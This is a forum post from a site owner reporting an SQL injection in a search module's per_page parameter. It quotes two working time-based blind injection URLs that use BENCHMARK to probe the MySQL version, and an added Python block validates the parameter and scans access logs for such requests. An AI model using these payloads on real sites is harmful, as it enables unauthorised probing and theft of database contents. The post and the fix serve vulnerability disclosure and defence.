search module sql injections

edited September 2015 in Modules
Hi!
One of our users wrote me a letter about a vulnerability on our site.
Our site uses the search module and, if you write this in the address bar:
http:// MY_DOMAIN . com /search?q=what&per_page=1%20PROCEDURE%20analyse((select%20extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1)%20LIKE%205,%20BENCHMARK(50000000,SHA1(1)),1))))),1)%23
the site freezes for a moment, as IF(MID(version(),1,1)%20LIKE%205 is true.
And thus it is possible to sort the data on the website.
And if you write it this way, the site opens immediately:
http:// MY_DOMAIN . com /search?q=або&per_page=1%20PROCEDURE%20analyse((select%20extractvalue(rand(),concat(0x3a,(if(version()<5,BENCHMARK(50000000,SHA1(1)),1))))),1)%23
as we have a MySQL version not less than 5 - version()<5

I'm not very good at sql injections, what do you think about it?
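
An added example, not part of the original post or the search module's code: one way to close this hole and to spot the requests in an access log, assuming `per_page` ends up in the query's LIMIT clause. The function names, the `posts` table, the 100-row cap and the log lines are hypothetical, and SQLite stands in for MySQL.

```python
import re
import sqlite3
from urllib.parse import urlsplit, parse_qs

MAX_PER_PAGE = 100                      # assumed site limit
_PLAIN_INT = re.compile(r"[0-9]{1,4}")  # ASCII digits only, nothing else

def safe_per_page(raw, default=10):
    """Return a bounded int for LIMIT, or the default when raw is not a plain number."""
    if raw is None or not _PLAIN_INT.fullmatch(raw):
        return default
    return max(1, min(int(raw), MAX_PER_PAGE))

def search(conn, term, per_page_raw):
    """Hypothetical handler: both values reach SQL only as bound parameters."""
    sql = "SELECT title FROM posts WHERE title LIKE ? ORDER BY id LIMIT ?"
    rows = conn.execute(sql, (f"%{term}%", safe_per_page(per_page_raw)))
    return [r[0] for r in rows]

def flag_requests(log_lines):
    """Return (line number, decoded per_page) for requests with a non-numeric per_page."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        hits += [(n, v) for v in query.get("per_page", []) if not _PLAIN_INT.fullmatch(v)]
    return hits

def demo_db():
    """Constructed in-memory table standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO posts (title) VALUES (?)",
                     [("what is new",), ("what next",), ("other",)])
    return conn

# Constructed log lines; the second is a shortened form of the request in the post.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Sep/2015:10:00:00 +0000] "GET /search?q=what&per_page=20 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Sep/2015:10:00:05 +0000] "GET /search?q=what&per_page=1%20PROCEDURE%20analyse(1,1)%23 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(search(demo_db(), "what", "1 PROCEDURE analyse(1,1)#"))
    print(flag_requests(SAMPLE_LOG))
```

Because the value is rejected unless it is entirely digits, anything appended after the number falls back to the default page size and never becomes part of the SQL text.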
